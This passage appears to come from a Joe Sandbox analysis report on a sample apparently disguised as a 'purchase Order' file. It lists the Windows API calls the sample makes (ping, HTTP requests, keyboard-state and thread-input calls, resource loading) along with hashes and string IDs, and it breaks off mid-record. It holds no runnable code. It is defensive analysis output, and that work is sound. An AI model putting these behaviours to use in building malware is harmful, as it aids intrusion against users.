                                                        • Opcode Fuzzy Hash: 707729a9df99fe5dec1179557edcc3c5766f54dcf32e0257e4cf257c39919ed8
                                                        • Instruction Fuzzy Hash: 6B710138400205DFCF219F68CC80AEE3BB5FF48325F184269ED665A2A6E7319D85DF60
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00C98168
                                                        • inet_addr.WSOCK32(?,?,?), ref: 00C981AD
                                                        • gethostbyname.WSOCK32(?), ref: 00C981B9
                                                        • IcmpCreateFile.IPHLPAPI ref: 00C981C7
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C98237
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C9824D
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C982C2
                                                        • WSACleanup.WSOCK32 ref: 00C982C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 82cae3f16c2445506c63b967821de1ba0222f750d8362c6ebacd3ff3689a20e5
                                                        • Instruction ID: 021f21d3999686d9146b4f9f4e02e63224627460c519fa79a27b88fa7b206978
                                                        • Opcode Fuzzy Hash: 82cae3f16c2445506c63b967821de1ba0222f750d8362c6ebacd3ff3689a20e5
                                                        • Instruction Fuzzy Hash: 0951B2316007019FDB20AF64CC49B2EB7E4FF49720F144969FA66DB2A1DB70E909DB41
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                          • Part of subcall function 00C5B63C: GetCursorPos.USER32(000000FF), ref: 00C5B64F
                                                          • Part of subcall function 00C5B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00C5B66C
                                                          • Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000001), ref: 00C5B691
                                                          • Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000002), ref: 00C5B69F
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00CAED3C
                                                        • ImageList_EndDrag.COMCTL32 ref: 00CAED42
                                                        • ReleaseCapture.USER32 ref: 00CAED48
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00CAEDF0
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CAEE03
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CAEEDC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                                        • API String ID: 1924731296-2104563098
                                                        • Opcode ID: 02d2a7a5bf68979478c5d8f45bcc1fd24c1da4abd7cbfdfe0b331c5ceaed8d55
                                                        • Instruction ID: 6d057cba4b336143c1eba52b8c108f19ed250ecc48fec58f130c2187fd7e9c43
                                                        • Opcode Fuzzy Hash: 02d2a7a5bf68979478c5d8f45bcc1fd24c1da4abd7cbfdfe0b331c5ceaed8d55
                                                        • Instruction Fuzzy Hash: 8851BD74504300AFD714EF20CC96F6A77E4FB88704F40492DF996972E2DB719948DBA2
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C8E396
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C8E40C
                                                        • GetLastError.KERNEL32 ref: 00C8E416
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00C8E483
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: bb926c90ab9d269e7ee337de14447371703e8b60f1bff043593a769933e67990
                                                        • Instruction ID: cd694b145d1f0613dc00357cc4afbbd6900317287b516312b25c47f046935722
                                                        • Opcode Fuzzy Hash: bb926c90ab9d269e7ee337de14447371703e8b60f1bff043593a769933e67990
                                                        • Instruction Fuzzy Hash: 9F316335A00209AFDB01EBA4C885FBE77B4FF85308F148029E51AA72A1D770DA41D755
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00CA8EE4
                                                        • GetDC.USER32(00000000), ref: 00CA8EEC
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CA8EF7
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00CA8F03
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CA8F3F
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CA8F50
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00CA8F8A
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CA8FAA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID: @U=u
                                                        • API String ID: 3864802216-2594219639
                                                        • Opcode ID: 35b7519e34f5df98496712dd171b1d7a861e7792b912c9c09a72e2740593492f
                                                        • Instruction ID: b1e4c4338eb05b2c7adaeab5c84768c9925c1b26df72a23d0b03f3c73ff651b7
                                                        • Opcode Fuzzy Hash: 35b7519e34f5df98496712dd171b1d7a861e7792b912c9c09a72e2740593492f
                                                        • Instruction Fuzzy Hash: 57318E72200214BFEB108F94CC4AFEB3BADEF4A715F044065FE4ADA291CAB59841CB74
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00C9B2D5
                                                        • CoInitialize.OLE32(00000000), ref: 00C9B302
                                                        • CoUninitialize.OLE32 ref: 00C9B30C
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00C9B40C
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C9B539
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00C9B56D
                                                        • CoGetObject.OLE32(?,00000000,00CCD91C,?), ref: 00C9B590
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00C9B5A3
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C9B623
                                                        • VariantClear.OLEAUT32(00CCD91C), ref: 00C9B633
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: 91a8ab5e88a05df542fb1bd5f61ee8f1d9356904bd62971df81913be524a5f16
                                                        • Instruction ID: 1dce07835fbdfc2ace713a471fc97ff300216e473a3d47d5a4ce831780440d14
                                                        • Opcode Fuzzy Hash: 91a8ab5e88a05df542fb1bd5f61ee8f1d9356904bd62971df81913be524a5f16
                                                        • Instruction Fuzzy Hash: 44C113B1608301AFCB00DF65D988A2AB7E9FF88704F04492DF58ADB261DB71ED45CB52
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00C867FD
                                                        • __swprintf.LIBCMT ref: 00C8680A
                                                          • Part of subcall function 00C6172B: __woutput_l.LIBCMT ref: 00C61784
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00C86834
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00C86840
                                                        • LockResource.KERNEL32(00000000), ref: 00C8684D
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00C8686D
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00C8687F
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00C8688E
                                                        • LockResource.KERNEL32(?), ref: 00C8689A
                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C868F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                        • String ID:
                                                        • API String ID: 1433390588-0
                                                        • Opcode ID: 978ca65b7a546352d631956144d7220a14aea470736729c44a7e3ae10ad49267
                                                        • Instruction ID: 54d2605addea9e302955fabcb67700a82d213ae5a23ec508a3768922eb92c493
                                                        • Opcode Fuzzy Hash: 978ca65b7a546352d631956144d7220a14aea470736729c44a7e3ae10ad49267
                                                        • Instruction Fuzzy Hash: 5A3190B190021AABDB11AF61DD45FBF7BA8EF08345F048425F916E6190E730DE11DB74
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00C84047
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C8405B
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00C84062
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C830A5,?,00000001), ref: 00C84071
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C84083
                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C830A5,?,00000001), ref: 00C8409C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C830A5,?,00000001), ref: 00C840AE
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C840F3
                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C84108
                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C830A5,?,00000001), ref: 00C84113
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: da6e2fa4e7759d070fe0682d2df05ea2e46b780ad7cfc04f0206fbcfd458ab42
                                                        • Instruction ID: 27c76277350452ba843f9fc5b4531af621727b70dea6f81954084789080655f3
                                                        • Opcode Fuzzy Hash: da6e2fa4e7759d070fe0682d2df05ea2e46b780ad7cfc04f0206fbcfd458ab42
                                                        • Instruction Fuzzy Hash: B031C171500306EFEB14EF55DC89F6EB7ADAB5031AF108015F919E6290CBB49A80CB68
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00CB016D
                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00CB038D
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CB03AB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00CB03D6
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CB03FF
                                                        • ShowWindow.USER32(00000003,00000000), ref: 00CB0421
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CB0440
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                        • String ID: @U=u
                                                        • API String ID: 3356174886-2594219639
                                                        • Opcode ID: 07546f5b0b7617c42a64a8da34f938c13f4a299a03fc802a3292c2226a9485ff
                                                        • Instruction ID: 7f328ac9cc5227f490aba7d51e421cd7ca208aa0f55d0b5d5a5c0db592b39047
                                                        • Opcode Fuzzy Hash: 07546f5b0b7617c42a64a8da34f938c13f4a299a03fc802a3292c2226a9485ff
                                                        • Instruction Fuzzy Hash: F5A18F35600616EFDB18CF68C9897FEBBB1BF44741F248125EC65A72A0D774AE50CB90
                                                        APIs
                                                        • EnumChildWindows.USER32(?,00C7CF50), ref: 00C7CE90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: dc3ad13a08c3db6f87676050501ebfe0ce4f85316887d5a4c08a1df7821da8e4
                                                        • Instruction ID: dec3f1b46502cc565f02ee99b6caae129bdf50d0e5e0870330973617040792a0
                                                        • Opcode Fuzzy Hash: dc3ad13a08c3db6f87676050501ebfe0ce4f85316887d5a4c08a1df7821da8e4
                                                        • Instruction Fuzzy Hash: 21914E7060060BABCB58DF60C4C2BEAFB75BF14340F54C519E95EA7151DF30AA99DB90
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C430DC
                                                        • CoUninitialize.OLE32(?,00000000), ref: 00C43181
                                                        • UnregisterHotKey.USER32(?), ref: 00C432A9
                                                        • DestroyWindow.USER32(?), ref: 00CB5079
                                                        • FreeLibrary.KERNEL32(?), ref: 00CB50F8
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB5125
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 7f312ae5b567d36f6ca145c605960a0cdc4727c45067b70bc1f8e90646c56f65
                                                        • Instruction ID: 9f6753c3b7725a3a400154c0f933a5e48f1595fcfd08224d1c463721964056b1
                                                        • Opcode Fuzzy Hash: 7f312ae5b567d36f6ca145c605960a0cdc4727c45067b70bc1f8e90646c56f65
                                                        • Instruction Fuzzy Hash: 629139347002428FC719EF24D995FA8F3A4FF54304F5482A9E91AA7262DF30AE5ADF54
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CA9B19
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CA9B2D
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CA9B47
                                                        • _wcscat.LIBCMT ref: 00CA9BA2
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CA9BB9
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CA9BE7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: @U=u$SysListView32
                                                        • API String ID: 307300125-1908207174
                                                        • Opcode ID: 088c18e660febd601c72173ab51ae32bf5f9ac719cc5ebd1d0a2f90cc71fce9c
                                                        • Instruction ID: 85ea32812f799a8f2b2f380d3b1ceaa4d8712e153b99f4cae50b1c6bc8346279
                                                        • Opcode Fuzzy Hash: 088c18e660febd601c72173ab51ae32bf5f9ac719cc5ebd1d0a2f90cc71fce9c
                                                        • Instruction Fuzzy Hash: FA41BF71900309ABDB21DFA4DC86FEE77B8EF09354F10042AF699E7291C6719E84DB60
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C945FF
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C9462B
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C9466D
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C94682
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C9468F
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C946BF
                                                        • InternetCloseHandle.WININET(00000000), ref: 00C94706
                                                          • Part of subcall function 00C95052: GetLastError.KERNEL32(?,?,00C943CC,00000000,00000000,00000001), ref: 00C95067
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 1241431887-3916222277
                                                        • Opcode ID: f6fc4d34976096da2fbf2beab82e3728ca7a698de3a95e17ee0aaf56cf6a9a56
                                                        • Instruction ID: ed8572d91486e830323c0d7162e2db5affe87693ce30bdcd278da7626faa5dca
                                                        • Opcode Fuzzy Hash: f6fc4d34976096da2fbf2beab82e3728ca7a698de3a95e17ee0aaf56cf6a9a56
                                                        • Instruction Fuzzy Hash: 51417EB1501209BFEF169F54CC89FBF77ACEF09304F004126FA159A155D7B0DA459BA4
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CA8FE7
                                                        • GetWindowLongW.USER32(015DF168,000000F0), ref: 00CA901A
                                                        • GetWindowLongW.USER32(015DF168,000000F0), ref: 00CA904F
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CA9081
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CA90AB
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA90BC
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CA90D6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 2178440468-2594219639
                                                        • Opcode ID: 376f0ce9e84e8aaa1dcdd7ade8a80e23c158b9339c6262c90116b4348e1a4c8d
                                                        • Instruction ID: b65955d30e72cd73ef46cf262a78eb34f2b50af9e68bbf0f99dc6a22650c7d94
                                                        • Opcode Fuzzy Hash: 376f0ce9e84e8aaa1dcdd7ade8a80e23c158b9339c6262c90116b4348e1a4c8d
                                                        • Instruction Fuzzy Hash: BF313538600216EFDB20CF58DC86F6937A9FB4A758F154164F629CB2B1CBB2AD40DB51
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CDDC00), ref: 00C9B715
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CDDC00), ref: 00C9B749
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C9B8C1
                                                        • SysFreeString.OLEAUT32(?), ref: 00C9B8EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 1936925835c5f24075bab2e7944c0e817621f92e5808dba85eb0e40033a4b6ce
                                                        • Instruction ID: b4aa9969edbff3511b811b243e3d8b45297446e88194ffdee40762ba896766cf
